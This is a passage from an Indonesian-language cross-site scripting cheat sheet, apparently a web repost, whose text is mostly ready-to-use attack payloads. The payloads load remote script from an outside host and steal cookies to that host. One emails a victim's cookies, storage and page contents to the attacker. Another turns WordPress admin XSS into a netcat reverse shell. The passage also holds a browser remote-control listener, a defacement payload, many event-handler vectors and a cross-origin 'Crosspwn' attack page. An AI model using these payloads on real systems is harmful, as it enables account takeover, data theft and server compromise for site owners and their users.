XMLHttpRequest();x.open(&#39;GET&#39;,&#39;//hackerinthehouse.in/0.php&#39;);x.send();
x.onreadystatechange=function(){if(this.readyState==4){write(x.responseText)}}&quot;

fetch(&#39;//hackerinthehouse.in/0.php&#39;).then(function(r){r.text().then(function(w) {write(w)})})

* (with fully loaded JQuery library)
$.get(&#39;//hackerinthehouse.in/0.php&#39;,function(r){write(r)})&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;2. Berbasis Javascript (respon harus javascript)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;with(document)body.appendChild(createElement(&#39;script&#39;)).src=&#39;//hackerinthehouse.in/2.js&#39;
* (with fully loaded JQuery library)
$.getScript(&#39;//hackerinthehouse.in/2.js&#39;)&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;WordPress XSS ke RCE (hingga v4.9.1)&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan itu sebagai skrip jarak jauh untuk dijalankan ketika admin WordPress mendapatkan XSS dengan pendengar seperti netcat di port 5855. Plugin &quot;Hello Dolly&quot; adalah targetnya di sini, tetapi hampir semua plugin lain dapat digunakan, mengubah file dan jalur yang sesuai.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;p = &#39;/wordpress/wp-admin/plugin-editor.php?&#39;;
q = &#39;file=hello.php&#39;;
s = &#39;&amp;lt;?=`nc localhost 5855 -e /bin/bash`;&#39;;
a = new XMLHttpRequest();
a.open(&#39;GET&#39;, p+q, 0);
a.send();
$ = &#39;_wpnonce=&#39; + /nonce&quot; value=&quot;([^&quot;]*?)&quot;/.exec(a.responseText)[1] +
&#39;&amp;amp;newcontent=&#39; + s + &#39;&amp;amp;action=update&amp;amp;&#39; + q;
b = new XMLHttpRequest();
b.open(&#39;POST&#39;, p+q, 1);
b.setRequestHeader(&#39;Content-Type&#39;, &#39;application/x-www-form-urlencoded&#39;);
b.send($);
b.onreadystatechange = function(){
if (this.readyState == 4) {
fetch(&#39;/wordpress/wp-content/plugins/hello.php&#39;);
}
}&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Blind Mailer XSS&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan itu sebagai skrip jarak jauh XSS buta yang disimpan sebagai file PHP dan ubah $to dan $headers vars sesuai. Server email yang berfungsi harus ada.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;?php header(&quot;Content-type: application/javascript&quot;); ?&amp;gt;


var mailer = &#39;&amp;lt;?php echo &quot;//&quot; . $_SERVER[&quot;SERVER_NAME&quot;] .
$_SERVER[&quot;REQUEST_URI&quot;] ?&amp;gt;&#39;;


var msg = &#39;USER AGENT\n&#39; + navigator.userAgent + &#39;\n\nTARGET URL\n&#39; +
document.URL;
msg += &#39;\n\nREFERRER URL\n&#39; + document.referrer + &#39;\n\nREADABLE
COOKIES\n&#39; + document.cookie;
msg += &#39;\n\nSESSION STORAGE\n&#39; + JSON.stringify(sessionStorage) +
&#39;\n\nLOCAL STORAGE\n&#39; + JSON.stringify(localStorage);
msg += &#39;\n\nFULL DOCUMENT\n&#39; + document.documentElement.innerHTML;


var r = new XMLHttpRequest();
r.open(&#39;POST&#39;, mailer, true);
r.setRequestHeader(&#39;Content-type&#39;, &#39;application/x-www-form-urlencoded&#39;);
r.send(&#39;origin=&#39; + document.location.origin + &#39;&amp;amp;msg=&#39; +
encodeURIComponent(msg));


&amp;lt;?php
header(&quot;Access-Control-Allow-Origin: &quot; . $_POST[&quot;origin&quot;]);
$origin = $_POST[&quot;origin&quot;];
$to = &quot;myName@myDomain&quot;;
$subject = &quot;XSS Blind Report for &quot; . $origin;
$ip = &quot;Requester: &quot; . $_SERVER[&quot;REMOTE_ADDR&quot;] . &quot;\nForwarded For: &quot;.
$_SERVER[&quot;HTTP_X_FORWARDED_FOR&quot;];
$msg = $subject . &quot;\n\nIP ADDRESS\n&quot; . $ip . &quot;\n\n&quot; . $_POST[&quot;msg&quot;];
$headers = &quot;From: report@myDomain&quot; . &quot;\r\n&quot;;
if ($origin &amp;amp;&amp;amp; $msg) {
mail($to, $subject, $msg, $headers);
}
?&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Penyematan XSS Asing Tak Terlihat&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan untuk memuat XSS dari domain lain (atau subdomain) ke domain saat ini. Dibatasi oleh&lt;/div&gt;&lt;div&gt;header X-Frame-Options (XFO) target. Contoh di bawah lansiran dalam konteks brutelogic.com.br&lt;/div&gt;&lt;div&gt;terlepas dari domainnya.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;iframe src=&quot;//hackerinthehouse.in/xss.php?a=&amp;lt;svg onload=alert(document.domain)&amp;gt;&quot;
style=display:none&amp;gt;&amp;lt;/iframe&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Pencurian kue&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan untuk mendapatkan semua cookie dari pengguna korban yang ditetapkan oleh situs target. Cookie tidak dapat dilindungi oleh bendera keamanan httpOnly.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;fetch(&#39;//hackerinthehouse.in/?c=&#39;+document.cookie)&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Deface Virtual Sederhana&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan untuk mengubah tampilan situs kepada korban yang menyediakan kode HTML. Pada contoh di bawah ini, pesan “Tidak Ditemukan” ditampilkan.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;svg onload=&quot;documentElement.innerHTML=&#39;&amp;lt;h1&amp;gt;Not Found&amp;lt;/h1&amp;gt;&#39;&quot;&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Kontrol Jarak Jauh Peramban&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan untuk menghubungkan browser dan mengirim perintah javascript ke sana secara interaktif. Gunakan kode javascript di bawah ini alih-alih alert(1) dalam injeksi Anda dengan terminal mirip Unix yang terbuka dengan skrip shell (pendengar) berikut. Berikan HOST sebagai nama host, alamat IP, atau domain untuk menerima perintah dari mesin penyerang.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Javascript:&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&lt;span style=&quot;-webkit-font-smoothing: antialiased; box-sizing: inherit; vertical-align: inherit;&quot;&gt;setInterval(function(){with(document)body.&lt;/span&gt;&lt;span style=&quot;-webkit-font-smoothing: antialiased; box-sizing: inherit;&quot;&gt;&lt;/span&gt;&lt;span style=&quot;-webkit-font-smoothing: antialiased; box-sizing: inherit; vertical-align: inherit;&quot;&gt;
appendChild(createElement(&#39;script&#39;)).src=&#39;//HOST:5855&#39;},100)&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Listener&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;hacker@inthehouse:~$ while :; do printf &quot;j$ &quot;; read c; echo $c | nc -lp 5855 &amp;gt;/dev/null; done&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;Ragam&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Halaman Tes Online XSS&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan untuk berlatih vektor dan muatan XSS. Periksa kode sumber untuk titik injeksi.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;https://hackerinthehouse.in/xss.php&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Injeksi HTML Sadar-Filter Multi-Kasus&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan sebagai sekali pakai untuk mendapatkan tingkat keberhasilan XSS yang lebih tinggi.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&#39;&quot;&amp;lt;/Script&amp;gt;&amp;lt;Html /Onmouseover=(alert)(1) //&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Penundaan Eksekusi Javascript&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan ketika perpustakaan javascript atau sumber daya lain yang diperlukan untuk injeksi tidak dimuat sepenuhnya dalam pelaksanaan payload. Panggilan eksternal berbasis JQuery digunakan sebagai contoh.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;onload=function(){$.getScript(&#39;//hackerinthehouse.in/2.js&#39;)}
onload=x=&amp;gt;$.getScript(&#39;//hackerinthehouse.in/2.js&#39;)&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Sumber yang Valid untuk Tag Gambar&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan saat Anda membutuhkan atribut src yang valid untuk memicu peristiwa pemuatan alih-alih kesalahan.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;imgsrc=data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAAC
ADs=onload=alert(1)&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;XSS terpendek&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan ketika Anda memiliki slot terbatas untuk injeksi. Membutuhkan skrip asli (&lt;/div&gt;&lt;div&gt;sudah ada dalam kode sumber) dipanggil dengan jalur relatif ditempatkan setelah injeksi mendarat. Server penyerang harus membalas dengan skrip penyerang untuk permintaan persis yang dilakukan oleh skrip asli (jalur yang sama) atau dalam halaman 404 default (lebih mudah). Semakin pendek domain, semakin baik.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;base href=//knoxss.me&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Mobile-only Event Handlers&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan saat menargetkan aplikasi seluler.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;html ontouchstart=alert(1)&amp;gt;
&amp;lt;html ontouchend=alert(1)&amp;gt;
&amp;lt;html ontouchmove=alert(1)&amp;gt;
&amp;lt;body onorientationchange=alert(1)&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Body Tag&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Kumpulan vektor tubuh. Yang terakhir hanya berfungsi untuk browser Microsoft.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;body onload=alert(1)&amp;gt;
&amp;lt;body onpageshow=alert(1)&amp;gt;
&amp;lt;body onfocus=alert(1)&amp;gt;
&amp;lt;body onhashchange=alert(1)&amp;gt;&amp;lt;a href=%23x&amp;gt;click this!#x
&amp;lt;body style=overflow:auto;height:1000px onscroll=alert(1) id=x&amp;gt;#x
&amp;lt;body onscroll=alert(1)&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;
&amp;lt;br&amp;gt;&amp;lt;x id=x&amp;gt;#x
&amp;lt;body onresize=alert(1)&amp;gt;press F12!
&amp;lt;body onhelp=alert(1)&amp;gt;press F1!&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Vektor XSS yang Kurang Dikenal&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Kumpulan vektor XSS yang kurang dikenal.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;marquee onstart=alert(1)&amp;gt;
&amp;lt;marquee loop=1 width=0 onfinish=alert(1)&amp;gt;
&amp;lt;audio src onloadstart=alert(1)&amp;gt;
&amp;lt;video onloadstart=alert(1)&amp;gt;&amp;lt;source&amp;gt;
&amp;lt;input autofocus onblur=alert(1)&amp;gt;
&amp;lt;keygen autofocus onfocus=alert(1)&amp;gt;
&amp;lt;form onsubmit=alert(1)&amp;gt;&amp;lt;input type=submit&amp;gt;
&amp;lt;select onchange=alert(1)&amp;gt;&amp;lt;option&amp;gt;1&amp;lt;option&amp;gt;2
&amp;lt;menu id=x contextmenu=x onshow=alert(1)&amp;gt;right click me!&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Cross-Origin Script (Crosspwn)&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Simpan konten di bawah ini sebagai file .php dan gunakan sebagai berikut:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&lt;span style=&quot;-webkit-font-smoothing: antialiased; box-sizing: inherit; vertical-align: inherit;&quot;&gt;http://facebook.com.localhost/crosspwn.php?&lt;/span&gt;&lt;span style=&quot;-webkit-font-smoothing: antialiased; box-sizing: inherit;&quot;&gt;&lt;/span&gt;&lt;span style=&quot;-webkit-font-smoothing: antialiased; box-sizing: inherit; vertical-align: inherit;&quot;&gt;
target=//hackerinthehouse.in/tests/status.html&amp;amp;msg=&amp;lt;script&amp;gt;peringatan(document.domain)&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;Di mana &quot;facebook.com&quot; adalah asal yang diizinkan dan &quot;localhost&quot; menyerang domain, &quot;//hackerinthehouse.in/tests/status.html&quot; adalah halaman target dan&lt;/div&gt;&lt;div&gt;&quot;&amp;lt;script&amp;gt;alert(document.domain)&quot; adalah pesan yang dikirim.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Penggunaan lainnya adalah untuk mengaktifkan onresize dan onhashchange body event handler tanpa&lt;/div&gt;&lt;div&gt;interaksi pengguna:&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;http://localhost/crosspwn.php?target=//hackerinthehouse.in/xss.php?
a=&amp;lt;body/onresize=alert(document.domain)&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Dan untuk mempersingkat dan menyembunyikan muatan yang disuntikkan, bidang tambahan &quot;nama&quot; dapat digunakan.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;http://localhost/crosspwn.php?target=//hackerinthehouse.in/xss.php?
a=&amp;lt;svg/onload=eval(name)&amp;gt;&amp;amp;name=alert(document.domain)&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;Code:
&amp;lt;!DOCTYPE html&amp;gt;
&amp;lt;body onload=&quot;crossPwn()&quot;&amp;gt;
&amp;lt;h2&amp;gt;CrossPwn&amp;lt;/h2&amp;gt;
&amp;lt;iframe src=&quot;&amp;lt;?php echo htmlentities($_GET[&#39;target&#39;], ENT_QUOTES) ?&amp;gt;&quot;
name=&quot;&amp;lt;?php echo $_GET[&#39;name&#39;] ?&amp;gt;&quot; height=&quot;0&quot;
style=&quot;visibility:hidden&quot;&amp;gt;&amp;lt;/iframe&amp;gt;
&amp;lt;script&amp;gt;
function crossPwn() {
frames[0].postMessage(&#39;&amp;lt;?php echo $_GET[&quot;msg&quot;] ?&amp;gt;&#39;,&#39;*&#39;); // onmessage
document.getElementsByTagName(&#39;iframe&#39;)[0].setAttribute(&#39;height&#39;, &#39;1&#39;); //
onresize
document.getElementsByTagName(&#39;iframe&#39;)[0].src = &#39;&amp;lt;?php echo
$_GET[&quot;target&quot;] ?&amp;gt;&#39; + &#39;#brute&#39;; // onhashchange
}
&amp;lt;/script&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Skrip XSS Finder Sederhana untuk PHP (Analisis Statis)&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan untuk menemukan potensi kelemahan XSS dalam kode sumber PHP. Untuk sistem mirip Unix: simpan konten di bawah, izinkan eksekusi dan jalankan dengan ./filename. Ini berfungsi untuk file tunggal dan rekursif (folder dan sub-folder).&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;if 